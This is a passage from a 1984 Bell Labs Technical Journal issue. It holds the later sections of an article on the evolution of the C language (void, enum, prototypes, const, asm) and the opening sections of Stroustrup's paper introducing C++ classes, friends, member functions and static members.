III. MANAGING INCOMPATIBLE CHANGES

Inevitably, some of the changes that were made alter the semantics of existing valid programs.
Those who maintain the various compilers used internally try to ensure that programmers have adequate warning that such changes are to take effect, and that the introduction of a new compiler release does not force all programs to be recompiled immediately. For example, in the earliest implementations the ambiguous expression x=-1 was interpreted to mean “decrement x by 1”. It is now interpreted to mean “assign the value -1 to x”. This change took place over the course of three annual major releases. First, the compilers and the lint program verifier6 were changed to generate a message warning about the presence of an “old-fashioned” assignment operator such as =-. Next, the parsers were changed to the new semantics, and the compilers warned about an ambiguous assignment operation. Finally, the warning messages were eliminated. Support for the use of an “old-fashioned initialization”

    int x 1;

(without an equals sign) was dropped by a similar strategy. This helps the parser produce more intelligent syntax-error diagnostics. Predictably, some C users ignored the warnings until introduction of the incompatible compilers forced them to choose between changing their obsolete source code or assuming maintenance of their own versions of the compiler. But on the whole the strategy of phased change was successful.

IV. SIGNIFICANT CHANGES

The changes discussed in this section represent significant shifts in the orientation and capabilities of the language. Unless we explicitly state otherwise, all the changes described are backward-compatible.

4.1 Float and double

In the arena of the original application of C (the implementation of UNIX systems), the efficiency of floating-point arithmetic was of little importance. Support libraries were simpler if only one type of value was handled. Furthermore, the hardware of the first production implementation favored the use of double precision over single precision.
These considerations manifested themselves as a requirement that all floating-point arithmetic be done in double precision (Ref. 2, Sect. 6.2). In addition to providing a marginally useful increase in default accuracy, this choice helped keep the code generators simple. This requirement now seems inappropriate, in view of the following changed circumstances:

1. Because of its other desirable attributes, C is being used more frequently in areas such as scientific calculation, where computationally oriented languages such as Fortran were the traditional choices. A general-purpose language should support floating-point arithmetic as efficiently as possible.

2. In fact, most implementations perform double-precision arithmetic more slowly than single-precision, and access to the operands is more costly.

3. Many code generators for C are enhanced to share support for languages (such as Fortran) that require single-precision arithmetic in a single-precision context.

Therefore, C compilers may now use single-precision operations to implement floating-point arithmetic that involves single-precision operands. Interfunction linkages (arguments, formal parameters, and return values) declared to be float are still coerced implicitly to double. This resembles the widening of char and short arguments to int, and simplifies the maintenance of libraries and the specification of constants as arguments. The called function can declare the formal parameter as float if desired.

4.2 Type specifiers

4.2.1 Void

Unlike many other languages, C makes no syntactic distinction between procedures that return a value (functions) and procedures that have only side effects (subroutines). Both are called functions in C. Because most useful functions do return values, in particular integer values in most systems programming environments, the language permits the declaration for a function returning an integer to be omitted (Ref. 2, Sect. 13).
Furthermore, even if a declaration is given, for example:

    extern f();

if no type is specified it is taken to be integer (Ref. 2, Sect. 8.2). This convenient default leads to various incorrect descriptions regarding functions that in fact return no value. For example, how could one declare a pointer to such a function? As some type must be specified:

    int (*fp)() = f;

the declaration is interpreted as a pointer to a function returning an integer, even though no value is in fact returned. The new type void has been added to deal with this anomaly. It can be used only to declare a function that returns no value or as a cast to state explicitly that the value returned by a function is being ignored. Obviously, the nonexistent “value” of a function declared as returning void cannot be used in an expression or cast to any other type.

4.2.2 Enum

An enumeration data type has been added to C. It is similar in intent to the enumerated type of Pascal — to restrict the set of values that can be assigned to specific integer variables. In the following example

    enum fruit {apple, orange, pear} lunch, dinner;

lunch and dinner are integer variables that have assigned to them only the values apple, orange, or pear. The optional tag fruit may be used to refer to this enumeration elsewhere. A significant difference from Pascal is that values may be specified for any or all of the integer constants that constitute an enumeration:

    enum permissions { read = 4, write = 2, execute = 1 };

A value may even be duplicated:

    enum unities { one = 1, uno = 1, eins = 1, odin = 1 };

The name of an enumeration constant may not be reused in a different enumeration, however, even with the same value. The successor, predecessor, and ordinal functions of Pascal are not available. Therefore, it is not possible in C to write a simple loop over the values of an enumeration variable, because they need not form a linear sequence.
Enumeration constants provide a convenient way of moving into the compiler proper a task that could be handled in the preprocessor by a list of #define names. This helps in symbolic debugging, as the identifiers themselves appear in the symbol table. It also eliminates the need to supply sequential values that may in themselves have no interest.

4.3 Structures and unions

4.3.1 Names of members

In the original specification (Ref. 2, Sect. 8.5), all members of structures in a single compilation had to have unique names. The only exception was that the same name could be used in two different structures if the type and offset were the same in both. Because of the likelihood of name conflicts in large applications (where header files might include several hundred structure definitions), these rules were relaxed to allow the same name to be used in more than one structure or union, even with different types or offsets. For this to be effective, any reference to a structure or union member must be fully qualified, and the type of reference must be the same as the type of structure or union containing the member referred to. In other words, it is no longer valid to refer to one type of structure using a pointer declared as pointing to another type of structure, or using an integer as a pointer. An explicit cast must be used. This closes a previous loophole (Ref. 2, Sect. 14.1) and is not backward-compatible. (Type equivalence is name equivalence — structures with different tags are of different types, even if their members are identical.) This major change was introduced in phases, in the same way as the change from =op to op= described in an earlier section. Compiler warnings identified incomplete qualifications and type conflicts, but the programs could still be compiled unambiguously, as the names of members all had to be unique to begin with.

4.3.2 Assignments, parameters, and function values

As Ref. 2, Sect.
14.1 predicts, the semantics of structures and unions has been enriched. The value of a structure or union may be assigned to another one of the same type; a structure or union may be passed as an argument to a function; and a function may return a structure or union as its value. For example:

    struct s a, b, f();
    a = b;
    a = f(b);

are valid declarations and statements. Even though similar operations on arrays exist in other languages, these desirable enhancements could not be retrofitted to arrays in C. The interpretation of an array name as a pointer expression is embedded too deeply in existing programs (Ref. 2, Sect. 7.1).

V. OTHER CHANGES

These changes are presented here in the order of the relevant sections in The C Reference Manual. They also are backward-compatible, except as described.

5.1 Lexical conventions

Form feeds and vertical tabs are added to the list of characters (Ref. 2, Sect. 2) that serve as “white space” to separate tokens and “line breaks” for compiler control lines. No semantics had previously been ascribed to these characters.

5.2 Key words

As we discussed above, two new key words, void and enum, were added to represent new types. This change affects only programs that happened to use those words as identifiers. The entry key word (Ref. 2, Sect. 2.3) was never implemented and is no longer reserved.

5.3 Constants

The digits 8 and 9 are no longer accepted in octal-integer constants (Ref. 2, Sect. 2.4.1). Though not backward-compatible, this change had little impact, as few programmers used this quirk in writing octal constants. Previously, the backslash in an undefined escape sequence in a character or string constant was explicitly ignored (Ref. 2, Sect. 2.4.3), so that '\z', for example, was a strange but acceptable way of writing 'z'. Now, the meaning of an undefined escape sequence is explicitly undefined, so '\z' has no meaning.
This too is an incompatible change, but is justifiable since it allows new escape sequences to be defined in the future without affecting existing valid programs. As an example, the escape sequence \v has been added to denote a vertical tab. A proposal has been adopted to use the escape sequence \xddd to describe a hexadecimal constant, analogous to the existing \ddd notation for an octal constant.

5.4 Initialization

Arbitrary restrictions in any area of a language are undesirable, since they add to the difficulty of learning and using it. The restriction against initializing an automatic array or structure (Ref. 2, Sect. 8.6) was based on practical considerations of compiler complexity, not on theoretical objections. This restriction has been removed, though no compiler yet implements this capability. The syntax is identical to that used for initializing an external or static array or structure. The restriction against initializing a union was based on the lack of suitable unambiguous syntax. The ANSI draft standard will propose that a union be initialized according to the type of the first member in its declaration, ascribing for the first time significance to the order of declaration. With these changes, there will no longer be any object that cannot be initialized.

5.5 Type specifiers

Every size of integer now has a corresponding unsigned type (Ref. 2, Sect. 8.2). In anticipation of the extension of C to support more than two sizes of floating-point numbers (in accordance with a proposed IEEE standard6), the type long float is no longer accepted as a synonym for double. This change should have minimal impact on existing programs, as the synonym seems to have been used infrequently, if at all.

5.6 Defined type

Even though in a construction such as

    typedef int KILOMETERS;
    KILOMETERS distance;

the type of distance is int (Ref. 2, Sect. 8.8), the defined type may not be further modified by long, short, or unsigned.
For example,

    long KILOMETERS to_the_moon;

is invalid; a new type must be defined:

    typedef long int ASTRONOMICAL;
    ASTRONOMICAL to_the_moon;

This is a clarification, not a change.

5.7 Switch statement

The restriction that the controlling expression of a switch statement have type int (Ref. 2, Sect. 9.2) is being removed. Any integral type will be permitted, and the case-expressions will be coerced to that type.

5.8 External data definitions

Of all the areas of potential change, this has caused the most controversy. The manual states (Ref. 2, Sect. 10.2) that the default storage class for an external data definition is extern. Thus, when several external data definitions of the form int i appear, the intention is to define a single variable, i, whether or not the extern key word is present. This implies the existence of a mechanism similar to that of Common in Fortran, which associates multiple definitions of the same external identifier. Limitations in the support software in several vendor-supplied operating systems make it difficult or impossible to implement this design intent. Therefore, a distinction was introduced (Ref. 2, Sect. 11.2) in the use of the extern key word: its appearance indicated a declaration for the external variable in question, its absence indicated a definition. Most important of all, there has to be exactly one such definition in the set of files constituting a single program. Thus this restriction is actually a portability constraint imposed by some environments, not a characteristic of the C language itself. The capability of many UNIX system implementations to allow more than one identical external data definition to appear (without the extern key word) is considered to be an extension to the more restrictive ANSI draft standard.

5.9 Compiler control lines

The conditional-compilation facility (Ref. 2, Sect. 12.3) has been enhanced in two ways.
To facilitate selection of one among a set of choices, any number of control lines of the form

    #elif constant-expression

may now appear between a #if line and its closing #endif (or #else if present). The new pseudofunction defined(identifier) may be used in the constant-expression part of a #if or #elif control line, with value 1 if the identifier is currently defined in the preprocessor, and 0 otherwise. Thus, #ifdef identifier is equivalent to #if defined(identifier), and #ifndef identifier is equivalent to #if !defined(identifier). The older forms will be retained for backward compatibility, as they are deeply entrenched in existing code. But, as they are superfluous, equivalents to #ifdef will not be provided for the new construction #elif.

VI. INTRACTABLE PROBLEMS

6.1 Preprocessing

One unfortunate effect of preprocessing the text before compilation is that programmers must know which functions are macroinstructions. They may not be declared; they do not obey the call-by-value semantics of C functions; and their arguments may be evaluated an unknown number of times, so side effects are unpredictable. A general trend for the future will be to rely less on the preprocessor and more on the compiler.

6.2 Integer sizes

Although the portability of C has been amply demonstrated over the past decade,5,7 persistent problems arise where the size of a long int differs from that of an ordinary int. For example, the difference of two pointers has been described as an ordinary int (Ref. 2, Sect. 7.4). But in a large-address environment where a pointer has the same size as a long int (Ref. 2, Sect. 14.4), an ordinary int may not be large enough to store the difference. This would impose an arbitrary limit on the size of an array. It is now agreed that the difference should have the same size as the pointers being subtracted. This solves the problem only in part.
Consider the common situation where the difference is used, for example, as an argument to an input/output function. Such an argument cannot be declared portably, but a suitable type definition could be provided as part of a standard header file.

VII. FUTURE DIRECTIONS

All the enhancements and changes to the language defined by Kernighan and Ritchie2 discussed in the preceding sections exist in many widely used compilers and have been presented to the ANSI X3J11 committee for standardization. The section that follows deals with later proposals that are still being evaluated. One major proposed enhancement, the introduction of classes (abstract data types) similar to those of Simula, is presented in a companion article.8 Other enhancements, presented in this section, are in use internally, but have not yet been exposed to large numbers of programmers. They are reported here to indicate some of the anticipated directions of language evolution.

7.1 Argument typing

At present, most C compilers make no checks on the number and type consistency of function invocations, even within a single compilation. In UNIX systems, this responsibility is delegated to the lint program verifier, which checks, among many other things, the consistency of function interfaces over an entire program set and associated libraries. Because of the computer resources required to do the extra parsing involved, the cost of using lint in the development of very large programs may be prohibitive. User-generated lint libraries that declare function arguments and return values but omit function bodies relieve this cost somewhat, but must be kept in phase with the real source. It would be better to provide a way, as part of a function declaration, for the compiler itself to be informed of not only the type returned by the function (as at present), but also of the types of the function arguments. A method has been developed to do this in a backward-compatible way.9 In a function declaration, arguments may be declared sequentially by type, thus:†

    char *fgets(char *, int, FILE *);

(† The examples are functions in the Standard Library, partly described in Chapter 7 of Kernighan and Ritchie.2)

When no further information about the arguments is provided, a trailing comma is added:

    int fscanf(FILE *, char *, );

When no information at all about the arguments is provided, nothing is between the parentheses, which is compatible with existing programs. The special case of declaring a function with no arguments is handled via the void key word:

    int rand(void);

Perhaps the most important payoff of argument typing is that, if possible, an argument is coerced to the type of its corresponding formal parameter, as if by assignment. This will eliminate a major source of interface errors in large programs. Incompatibilities (such as an integer argument and a pointer formal parameter) will cause fatal compilation errors.

7.2 The “const” type specifier

A new type specifier, const, has been added9 to meet a need that has long been recognized — declaring that the value with which a particular variable is initialized may not be changed during execution of the program. In some environments, this may simply tell the compiler not to allow the variable to appear on the left-hand side of an assignment and not to allow its address to be assigned to a pointer through which it may be modified. (Such an implementation could not protect against an inadvertent modification caused by a wild pointer.) This is the most protection that can be provided if the const variable has auto or register storage class, so that it is initialized dynamically on each entry to the block in which it is defined, and the value with which it is initialized is itself variable.
If the storage class of the variable is extern or static, or if the initializer is constant, the compiler may be able to place the data in an area of memory protected by hardware against modification. This also allows space to be saved by sharing the data among several simultaneous executions of the program, just as the program text may be shared in some implementations. The data may even be placed into read-only memory if desired. This mechanism is particularly appropriate for large arrays of permanent data, such as parse tables or constant character strings. To achieve the desired end, some programmers have resorted to editing the assembly language produced by current compilers. At the cost of reserving yet another key word (possibly used as an identifier in existing programs), this new facility legitimizes the needed capability in the language proper. An interesting distinction can be made between pointers that themselves are constant:

    char * const constant-pointer

and pointers to constant data:

    const char * pointer-to-constant

The latter can be used to declare that even though an argument is a pointer the function does not change the data pointed to.

    char *strcpy(char *, const char *);

declares that strcpy gets two arguments that are character pointers, but does not change the array pointed to by the second argument.

7.3 Assembler windows

Access to the hardware of the operating environment is often requested. Code for implementing operating systems or device drivers may need to manipulate particular registers or to execute instructions that are inaccessible from C but accessible through the assembly language of the machine. Assembly language may also be needed for efficiency. For example, C does not support the assignment of one array or string to another, and the programmer must write a loop to do this operation one element at a time. Yet many machines have extremely efficient implementations for block moves.
The need for access to special hardware is recognized by providing standardized library functions, which may be implemented either in C or in assembly language as appropriate to a particular environment. But, in time-critical applications, even the overhead of function linkage may be too high. Therefore, the need has long been felt for the ability to interject instructions in assembly language directly in the midst of C code. The use of such a mechanism destroys portability, and may interfere with analysis or optimization of the function containing the alien statements. Many existing C compilers use the key word asm for this purpose. A statement of the form

    asm (string);

causes the specified string to be injected directly into the assembly-language output of the compiler. This capability is still not powerful enough for many applications. No access is provided to identifiers in the C program, so the programmer may have to make assumptions about which registers should be addressed by the assembly-language statements. An experimental implementation now being evaluated uses the key word asm in a different context.10 A declaration of the form

    asm f(arg1, arg2, ...) (...)

defines a function f to be compiled in line (without function linkages). The programmer can specify alternate assembly-language expansions in the function prototype, depending on the storage classes of the actual parameters.

VIII. EVOLUTIONARY STUBS

By no means have all the experimental enhancements made to C been accepted as part of the official language. Many developers have tried to enrich the syntax of the language to individual tastes, but these efforts did not win wide support. This section describes one evolutionary stub of more substantial significance, which though it did not lead to changes in C did provide valuable insight into an important problem in the development of large programs by many programmers.
In a very large multifile C program, it is difficult to control the scopes of external definitions except by carefully structuring a multiplicity of header files and including them selectively in the various compilation units. One project tried a different solution to this problem: introducing new preprocessor directives to export explicitly the definitions of specific variables to other files and to import the declarations from other files. To eliminate unnecessary compilation, a program automatically generated files describing the dependencies for use by the make utility,11 or its enhancement, the build utility.12 This attempt foundered because of the need to create and maintain hidden interface files separate from the source files. This arose because of the possibility of circular dependencies between the variables in several files. The solution to this problem — explicitly separating the external interfaces from the program text and managing the dependencies using a database manager — is now part of the Ada† language and programming support environment. The valuable idea of generating “makefiles” automatically by analyzing the inclusions of header files is being incorporated in other tools, however.

IX. SUMMARY

In its decade of existence, C grew beyond its original conception as a language for implementing operating systems into a full general-purpose language. This was accomplished by small changes, mostly backward-compatible, that have not fundamentally altered the original sparse design. A major trend in the development of the language is toward stricter type checking, particularly in the use of pointers and in function argument type checking. On the other hand, the model of computation remains close to that of the underlying hardware. Though mature, the C language continues to evolve in a controlled way.
Internal and external standardization activities will continue to impose requirements for backward compatibility in the future.

X. ACKNOWLEDGMENTS

Dennis M. Ritchie, the author of C, continues to be closely associated with its evolution and standardization. His perceptive observations and insights over the years are greatly appreciated. Many colleagues provided useful comments on drafts of this paper. I particularly thank Bjarne Stroustrup, whose ideas are strongly influencing the future evolution of the language. Lively discussions among the members of the X3J11 committee have helped clarify many potential misinterpretations of the language specification. Because of their potential value, the proposals described in Sections 7.1 (argument typing) and 7.2 (const) have been accepted by the X3J11 committee.

† Trademark of the U.S. Department of Defense, Ada Joint Program Office.

REFERENCES

1. D. M. Ritchie and K. L. Thompson, “The UNIX Time-Sharing System,” Commun. ACM, 17, No. 7 (July 1974), pp. 365-75.
2. B. W. Kernighan and D. M. Ritchie, The C Programming Language, Englewood Cliffs, N.J.: Prentice-Hall, 1978.
3. D. M. Ritchie, S. C. Johnson, M. E. Lesk, and B. W. Kernighan, “The C Programming Language,” B.S.T.J., 57, No. 6, Part 2 (July-August 1978), pp. 81-114.
4. IEEE Standard Pascal Computer Programming Language, New York: The Institute of Electrical and Electronics Engineers, Inc., 1983.
5. S. C. Johnson and D. M. Ritchie, “Portability of C Programs and the UNIX System,” B.S.T.J., 57, No. 6, Part 2 (July-August 1978), pp. 114-141.
6. Draft 10.0 of IEEE Task P754, A Proposed Standard for Binary Floating-Point Arithmetic, December 2, 1982.
7. L. Rosler, “The Best of UNIX on GCOS,” Honeywell Large Systems Users’ Association, October 1978.
8. B. Stroustrup, “The UNIX System: Data Abstraction in C,” AT&T Bell Lab. Tech. J., this issue.
9. B. Stroustrup, private communication.
10. R. J. Mascitti, private communication.
11. S. I.
Feldman, “Make—A Program for Maintaining Computer Programs,” Software—Practice and Experience, 9, No. 4 (April 1979), pp. 255-65.
12. V. B. Erickson and J. F. Pellegrin, “Build—A Software Construction Tool,” AT&T Bell Lab. Tech. J., 63, No. 6, Part 2 (July-August 1984), pp. 1049-59.

AUTHOR

Lawrence Rosler, A.B. (Physics), 1953, Cornell University; M.S., Ph.D. (Physics), Yale University, in 1954 and 1958, respectively; AT&T Bell Laboratories, 1957—. Mr. Rosler is Supervisor of the Language Systems Engineering group in the UNIX Languages and Programming Environment Development department. His early work involved the development of solid-state electronic devices. His more recent work includes the design of languages for interactive graphics terminals, the implementation of the C language and libraries on various systems, and the management of C language development for UNIX systems. Chairman, Language Subcommittee, American National Standards Institute Technical Committee X3J11 for the Programming Language C; member, ACM, APS, Sigma Xi, AAAS.

AT&T Bell Laboratories Technical Journal Vol. 63, No. 8, October 1984. Printed in U.S.A.

The UNIX System: Data Abstraction in C

By B. STROUSTRUP*

(Manuscript received August 5, 1983)

C++ is a superset of the C programming language; it is fully implemented and has been used for nontrivial projects. There are now more than one hundred C++ installations. This paper describes the facilities for data abstraction provided in C++. These include Simula-like classes providing (optional) data hiding, (optional) guaranteed initialization of data structures, (optional) implicit type conversion for user-defined types, and (optional) dynamic typing; mechanisms for overloading function names and operators; and mechanisms for user-controlled memory management. It is shown how a new data type, like complex numbers, can be implemented, and how an “object-based” graphics package can be structured.
A program using these data abstraction facilities is at least as efficient as an equivalent program not using them, and the compiler is faster than older C compilers.

I. INTRODUCTION

The aim of this paper is to show how to write C++† programs using “data abstraction”, as described below. This paper presents some general discussion of each new language feature to help the reader understand where that feature fits in the overall design of the language, which programming techniques it is intended to support, and what kinds of errors and costs it is intended to help the programmer avoid. However, this paper is not a reference manual, so it does not give complete details of the language primitives; these can be found in Ref. 3. C++ evolved from C1 through some intermediate stages, collectively known as “C with classes”.4,5 The primary influence on the design of the abstraction facilities was the Simula67 class concept.6,7 The intent was to create data abstraction facilities that are both expressive enough to be of significant help in structuring large systems, and at the same time useful in areas where C’s terseness and ability to express low-level detail are great assets. Consequently, while C classes provide general and flexible structuring mechanisms, great care has been taken to ensure that their use does not cause run time or storage overhead that could have been avoided in old C. Except for details like the introduction of new key words, C++ is a superset of C; see Section XXII, “Implementation and Compatibility” below. The language is fully implemented and in use. Tens of thousands of lines of code have been written and tested by dozens of programmers.

* AT&T Bell Laboratories.

† Note on the name C++: ++ is the C increment operator; when this operator is applied to a variable (typically a vector index or a pointer), it increments the variable so that it denotes the succeeding element. The name C++ was coined by Rich Mascitti. Consider ++ a surname, to be used only on formal occasions or to avoid ambiguity. Among friends C++ is referred to as C, and the C language described in the C book1 is “old C”. The slightly shorter name C+ is a syntax error; it has also been used as the name of an unrelated language. Connoisseurs of C semantics find C++ inferior to ++C, but the latter is not an acceptable name. The language is not called D, since it is an extension of C and does not attempt to remedy problems inherent in the basic structure of C. The name C++ signifies the evolutionary nature of the changes from old C. For yet another interpretation of the name C++ see the Appendix of Ref. 2.

Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted without payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information-service systems without further permission. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor.

The paper falls into three main sections:

1. A brief presentation of the idea of data abstraction.

2. A full description of the facilities provided for the support of that idea through the presentation of small examples. This in itself falls into three sections:

a. Basic techniques for data hiding, access to data, allocation, and initialization. Classes, class member functions, constructors, and function name overloading are presented (starts with Section III, “Restriction of Access to Data”).

b. Mechanisms and techniques for creating new types with associated operators. Operator overloading, user-defined type conversion, references, and free store operators are presented (starts with Section VIII, “Operator Overloading and Type Conversion”).

c. Mechanisms for creating abstraction hierarchies, for dynamic typing of objects, and for creating polymorphic classes and functions. Derived classes and virtual functions are presented (starts with Section XIV, “Derived Classes”).

Items b and c do not depend directly on each other.

3. Finally some general observations on programming techniques, on language implementation, on efficiency, on compatibility with old C, and on other languages are offered (starts with Section XVIII, “Input and Output”).

A few sections are marked as “digressions”; they contain information that, while important to a programmer, and hopefully of interest to the general reader, does not directly relate to data abstraction.

II. DATA ABSTRACTION

“Data abstraction” is a popular, but generally ill-defined, technique for programming. The fundamental idea is to separate the incidental details of the implementation of a subprogram from the properties essential to the correct use of it. Such a separation can be expressed by channeling all use of the subprogram through a specific “interface”. Typically the interface is the set of functions that may access the data structures that provide the representation of the “abstraction”. One reason for the lack of a generally accepted definition is that any language facility supporting it will emphasize some aspects of the fundamental idea at the expense of others. For example:

1. Data hiding — Facilities for specifying interfaces that prevent corruption of data and relieve a user from the need to know about implementation details.

2. Interface tailoring — Facilities for specifying interfaces that support and enforce particular conventions for the use of abstractions. Examples include operator overloading and dynamic typing.

3.
Instantiation — Facilities for creating and initializing one or more "instances" (variables, objects, copies, versions) of an abstraction.
4. Locality — Facilities for simplifying the implementation of an abstraction by taking advantage of the fact that all access is channeled through its interface. Examples include simplified scope rules and calling conventions within an implementation.
5. Programming environment — Facilities for supporting the construction of programs using abstractions. Examples include loaders that understand abstractions, libraries of abstractions, and debuggers that allow the programmer to work in terms of abstractions.
6. Efficiency — A language facility must be "efficient enough" to be useful. The intended range of applications is a major factor in determining which facilities can be provided in a language. Conversely, the efficiency of the facilities determines how freely they can be used in a given program. Efficiency must be considered in three separate contexts: compile time, link time, and run time.

The emphasis in the design of the C data abstraction facility was on 2, 3, and 6, that is, on facilities enabling a programmer to provide elegant and efficient interfaces to abstractions. In C, data abstraction is supported by enabling the programmer to define new types, called "classes". The members of a class cannot be accessed except in an explicitly declared set of functions. Simple data hiding can be achieved like this:

    class data_type {
        /* data declarations */
        /* list of functions that may use the data declarations ("friends") */
    };

where only the "friends" can access the representation of variables of class data_type as defined by the data declarations.
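The friend-only access just described can be sketched in present-day C++; the type name data_type is kept from the text, but the members and the functions set() and get() are invented for this illustration:

```cpp
#include <cassert>

// Only the two declared friends may touch the hidden representation;
// any other function referring to d.value is rejected by the compiler.
class data_type {
    int value;                          // hidden representation
    friend void set(data_type*, int);   // the "friends"
    friend int  get(data_type*);
};

void set(data_type* d, int v) { d->value = v; }
int  get(data_type* d)        { return d->value; }
```

Outside these two functions, `d.value` is inaccessible, which is precisely the data-hiding guarantee the text describes.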
Alternatively, and often more elegantly, one can define a data type where the set of functions that may access the representation is an integral part of the type itself:

    class object_type {
        /* declarations used to implement object_type */
    public:
        /* declarations specifying the interface to object_type */
    };

One obvious, but nontrivial, aim of many modern language designs is to enable programmers to define "abstract data types" with properties similar to the properties of the fundamental data types of the languages. Below we show how to add a data type complex to the C language, so that the usual arithmetic operators can be applied to complex variables. For example:

    complex a, x, y, z;
    a = x/y + 3*z;

The idea of treating an object as a black box is further supported by a mechanism for hierarchically constructing classes out of other classes. For example:

    class shape { /* ... */ };
    class circle : shape { /* ... */ };

The class circle can be used as a simple shape in addition to being used as a circle. Class circle is said to be a derived class with class shape as its base class. It is possible to leave the resolution of the type of objects sharing common base classes to run time. This allows objects of different types to be manipulated in a uniform manner.

III. RESTRICTION OF ACCESS TO DATA

Consider a simple old C fragment,† outlining an implementation of the concept of a date:

    struct date { int day, month, year; };

    struct date today;

    extern void set_date();
    extern void next_date();
    extern void next_today();
    extern void print_date();

There are no explicit connections between the functions and the data type, and no indication that these functions should be the only ones to access the members of the structure date. It ought to be possible to state such an intent. A simple way of doing this is to declare a data type that can only be manipulated by a specific set of functions.
For example:

    class date {
        int day, month, year;
        friend void set_date(date*, int, int, int),
                    next_date(date*),
                    next_today(),
                    print_date(date*);
    };

The key word class indicates that only functions mentioned as "friends" in the declaration can use the class member names day, month, and year; otherwise a class behaves like a traditional C struct. That is, the class declaration itself defines a new type of which variables can be declared. For example:

    date my_birthday, today;

    set_date(&my_birthday, 30, 12, 1950);
    set_date(&today, 23, 6, 1983);
    print_date(&today);
    next_date(&today);

Friend functions are defined in the usual manner. For example:

    void next_date(date* d)
    {
        if (++d->day > 28) {
            /* do the hard part */
        }
    }

† The key word void specifies that a function does not return a value. It was introduced into C about 1980.

This solution to the problem of data hiding is simple, and often quite effective. It is not perfectly flexible because it allows access by the "friends" to all variables of a type. For example, it is not possible to have a different set of friends for the dates my_birthday and today. A function can, however, be the friend of more than one class. The importance of this will be demonstrated in Section XIX. There is no requirement that a friend should only manipulate variables passed to it as arguments. For example, the name of a global variable may be built into a function:

    void next_today()
    {
        if (++today.day > 28) {
            /* do the hard part */
        }
    }

The protection of the data from functions that are not friends relies on restricting the use of class member names. It can therefore be circumvented by address manipulation and explicit type conversion. There are several benefits to be obtained from restricting access to a data structure to an explicitly declared list of functions.
Any error causing an illegal state of a date must be caused by code in the friend functions, so the first stage of debugging, localization, is completed before the program is even run. This is a special case of the general observation that any change to the behavior of the type date can and must be effected by changes to its friends. Another advantage is that a potential user of such a type need only examine the definition of the friends to learn to use it. Experience with C++ has amply demonstrated this.

IV. DIGRESSION: ARGUMENT TYPES

The argument types of the functions above were declared. This could not have been done in old C, nor would the matching function definition syntax used for next_date have been accepted. In C++ the semantics of argument passing are identical to those of initialization. In particular, the usual arithmetic conversions are performed. A function declaration that does not specify an argument type, for example next_today(), specifies that the function does not accept any arguments. This is different from old C; see Section XXII, "Implementation and Compatibility" below. The argument types of all declarations and the definition of a function must match exactly.

It is still possible to have functions that take an unspecified and possibly variable number of arguments of unspecified types, but such relaxation of the type checking must be explicitly declared. For example:

    int wild( ... );
    int fprintf(FILE*, char* ...);

The ellipsis specifies that any arguments (or none) will be accepted without any checking or conversion, exactly as in old C. For example:

    wild();
    wild("asdf", 10);
    wild(1.3, "ghjk", wild);

    fprintf(stdout, "x=%d", 10);
    fprintf(stderr, "file %s line %d\n", f_name, l_no);

Note that the first two arguments of fprintf must be present and will be checked.
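An ellipsis function of this kind can be sketched in modern C++, where the callee recovers the unchecked arguments with the <cstdarg> machinery. The function sum_ints and its count-first calling convention are invented for this example:

```cpp
#include <cstdarg>

// Arguments matching the "..." are passed with no checking or
// conversion; the callee must know their number and types itself.
// Here the first (checked) argument carries the count.
int sum_ints(int count, ...)
{
    va_list ap;
    va_start(ap, count);
    int s = 0;
    for (int i = 0; i < count; i++)
        s += va_arg(ap, int);   // caller promises these are ints
    va_end(ap);
    return s;
}
```

A call such as `sum_ints(3, 10, 20, 12)` is accepted whatever follows the count, which is exactly the loss of checking the text warns about.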
It has been noted, however, that functions with partly specified argument types are far less useful in C++ than they are in old C. Such functions are primarily useful for specifying interfaces to old C libraries. Default function arguments (Section IX), overloaded function names (Section VII), and operator overloading (Section VIII) are used instead. See also Section XVIII.

As ever, undeclared functions may be used and will be assumed to return integers. They must, however, be used consistently. For example:

    undef1(1, "asdf");
    undef1(2, "ghjk");      /* fine */

    undef2(1, "asdf");
    undef2("ghjk", 2);      /* error */

The inconsistent use of undef2 is detected by the compiler.

V. OBJECTS

The structure of a program using the class/friend mechanism to restrict access to the representation of a data type is exactly the same as the structure of a program not using it. This implies that no advantage has been taken of the new facility to make the functions implementing the operations on the type easier to write. For many types, a more elegant solution can be obtained by incorporating such functions into the new type itself. For example:

    class date {
        int day, month, year;
    public:
        void set(int, int, int);
        void next();
        void print();
    };

Functions declared this way are called member functions and can be invoked only for a specific variable of the appropriate type using the standard C structure member syntax. Since the function names no longer are global, they can be shorter:

    my_birthday.print();
    today.next();

On the other hand, to define a member function, one must specify both the name of the function and the name of its class:

    void date.next()
    {
        if (++day > 28) {
            /* do the hard part */
        }
    }

Variables of such types are often referred to as objects. The object for which the function is invoked constitutes a hidden argument to the function. In a member function, class member names can be used without explicit reference to a class object.
In that case, like the use of day above, the name refers to that member of the object for which the function was invoked. A member function sometimes needs to refer explicitly to this object, for example to return a pointer to it. This is achieved by having the key word this denote that object in every class function. Thus, in a member function this->day is equivalent to day for every member of the class date.

The public label separates the class body into two parts. The names in the first, "private", part can only be used by member functions (and friends). The second, "public", part constitutes the interface to objects of the class. A class function may access both public and private members of every object of its class, not just members of the one for which it was invoked.

The relative merits of friends and member functions will be discussed in Section XIX after a larger body of examples has been presented. For now, it is sufficient to notice that a friend is not affected by the "public/private" mechanism and operates on objects in a standard and explicit manner. A member, on the other hand, must be invoked for an object and treats that object differently from all others.

VI. STATIC MEMBERS

A class is a type, not a data object, and each object of the class has its own copy of the data members of the class. However, there are concepts (abstractions) that are best supported if the different objects of the class share some data. For example, to manage tasks in an operating system or a simulation, a list of all tasks is often useful:

    class task {
        task* next;
        static task* task_chain;
        void schedule(int);
        void wait(event);
        /* ... */
    };

Declaring the member task_chain as static ensures that there will only be one copy of it, not one copy per task object. It is still in the scope of class task, however, and can only be accessed from "the outside" if it was declared public.
In that case its name must be qualified by its class name:

    task::task_chain

In a member function it can be referred to as plain task_chain. The use of static class members can reduce the need for global variables considerably.

The operator :: (colon colon) is used to specify the scope of a name in expressions. As a unary operator it denotes external (global) names. For example, if the task function wait in a simulator needs to call a nonmember function wait, it can be done like this:

    void task.wait(event e)
    {
        ::wait(e);
    }

VII. CONSTRUCTORS AND OVERLOADED FUNCTIONS

